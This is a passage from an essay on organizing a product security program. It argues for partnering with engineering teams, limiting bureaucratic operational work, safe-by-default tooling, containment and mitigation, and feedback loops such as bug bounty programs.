of breaking somebody else’s software – and then write scathing but ineffectual critiques addressed to executives,
demanding that they either put a stop to a project or sign off on a risk. And hey, in the latter case, they better
brace for our triumphant “I told you so” at some later date.

Of course, escalations of this type have their place, but they need to be a very rare sight; when practiced routinely, they are a telltale
sign of a dysfunctional team. We might be failing to think up viable alternatives that are in tune with business or engineering needs; we might
be very unpersuasive, failing to communicate with other rational people in a language they understand; or it might be that our tolerance for risk
is badly out of whack with the rest of the company. Whatever the cause, I’ve seen high-level escalations where the security team
spoke of valiant efforts to resist inexplicably awful design decisions or data sharing setups; and where product leads in turn talked about
pressing business needs randomly blocked by obstinate security folks. Sometimes, simply having them compare their notes would be enough to arrive
at a technical solution – such as sharing a less sensitive subset of the data at hand.

To be effective, any product security program must be rooted in a partnership with the rest of the company, focused on helping them get stuff done
while eliminating or reducing security risks. To combat the toxic us-versus-them mentality, I found it helpful to have some team members with
software engineering backgrounds, even if it’s the ownership of a small open-source project or so. This can broaden our horizons, helping us see
that we all make the same mistakes – and that not every solution that sounds good on paper is usable once we code it up.

Getting off the treadmill

All security programs involve a good chunk of operational work. For product security, this can be a combination of product launch reviews, design consulting requests, incoming bug reports, or compliance-driven assessments of some sort. And curiously, such reactive work also has the property of gradually expanding to consume all the available resources on a team: next year is bound to bring even more review requests, even more regulatory hurdles, and even more incoming bugs to triage and fix.

Being more tractable, such routine tasks are also more readily enshrined in SDLs, SLAs, and all kinds of other official documents that are often mistaken for a mission statement that justifies the existence of our teams. Soon, instead of explaining to a developer why they should fix a particular problem right away, we end up pointing them to page 17 in our severity classification guideline, which defines that “severity 2” vulnerabilities need to be resolved within a month. Meanwhile, another policy may be telling them that they need to run a fuzzer or a web application scanner for a particular number of CPU-hours – no matter whether it makes sense or whether the job is set up right.

To run a product security program that scales sublinearly, stays abreast of future threats, and doesn’t erect bureaucratic speed bumps just for the sake of it, we need to recognize this inherent tendency for operational work to take over – and we need to reign it in. No matter what the last year’s policy says, we usually don’t need to be doing security reviews with a particular cadence or to a particular depth; if we need to scale them back 10% to staff a two-quarter project that fixes an important API and squashes an entire class of bugs, it’s a short-term risk we should feel empowered to take.

As noted in my earlier post, I find contingency planning to be a valuable tool in this regard: why not ask ourselves how the team would cope if the workload went up another 30%, but bad financial results precluded any team growth? It’s actually fun to think about such hypotheticals ahead of the time – and hey, if the ideas sound good, why not try them out today?

Living for a cause

It can be difficult to understand if our security efforts are structured and prioritized right; when faced with such uncertainty, it is natural to stick to the safe fundamentals – investing most of our resources into the very same things that everybody else in our industry appears to be focusing on today.

I think it’s important to combat this mindset – and if so, we might as well tackle it head on. Rather than focusing on tactical objectives and policy documents, try to write down a concise mission statement explaining why you are a team in the first place, what specific business outcomes you are aiming for, how do you prioritize it, and how you want it all to change in a year or two. It should be a fluid narrative that reads right and that everybody on your team can take pride in; my favorite way of starting the conversation is telling folks that we could always have a new VP tomorrow – and that the VP’s first order of business could be asking, “why do you have so many people here and how do I know they are doing the right thing?”. It’s a playful but realistic framing device that motivates people to get it done.

In general, a comprehensive product security program should probably start with the assumption that no matter how many resources we have at our disposal, we will never be able to stay in the loop on everything that’s happening across the company – and even if we did, we’re not going to be able to catch every single bug. It follows that one of our top priorities for the team should be making sure that bugs don’t happen very often; a scalable way of getting there is equipping engineers with intuitive and usable tools that make it easy to perform common tasks without having to worry about security at all. Examples include standardized, managed containers for production jobs; safe-by-default APIs, such as strict contextual autoescaping for XSS or type safety for SQL; security-conscious style guidelines; or plug-and-play libraries that take care of common crypto or ACL enforcement tasks.

Of course, not all problems can be addressed on framework level, and not every engineer will always reach for the right tools. Because of this, the next principle that I found to be worth focusing on is containment and mitigation: making sure that bugs are difficult to exploit when they happen, or that the damage is kept in check. The solutions in this space can range from low-level enhancements (say, hardened allocators or seccomp-bpf sandboxes) to client-facing features such as browser origin isolation or Content Security Policy.

The usual consulting, review, and outreach tasks are an important facet of a product security program, but probably shouldn’t be the sole focus of your team. It’s also best to avoid undue emphasis on vulnerability showmanship: while valuable in some contexts, it creates a hypercompetitive environment that may be hostile to less experienced team members – not to mention, squashing individual bugs offers very limited value if the same issue is likely to be reintroduced into the codebase the next day. I like to think of security reviews as a teaching opportunity instead: it’s a way to raise awareness, form partnerships with engineers, and help them develop lasting habits that reduce the incidence of bugs. Metrics to understand the impact of your work are important, too; if your engagements are seen mostly as a yet another layer of red tape, product teams will stop reaching out to you for advice.

The other tenet of a healthy product security effort requires us to recognize at a scale and given enough time, every defense mechanism is bound to fail – and so, we need ways to prevent bugs from turning into incidents. The efforts in this space may range from developing product-specific signals for the incident response and monitoring teams; to offering meaningful vulnerability reward programs and nourishing a healthy and respectful relationship with the research community; to organizing regular offensive exercises in hopes of spotting bugs before anybody else does.

Oh, one final note: an important feature of a healthy security program is the existence of multiple feedback loops that help you spot problems without the need to micromanage the organization and without being deathly afraid of taking chances. For example, the data coming from bug bounty programs, if analyzed correctly, offers a wonderful way to alert you to systemic problems in your codebase – and later on, to measure the impact of any remediation and hardening work.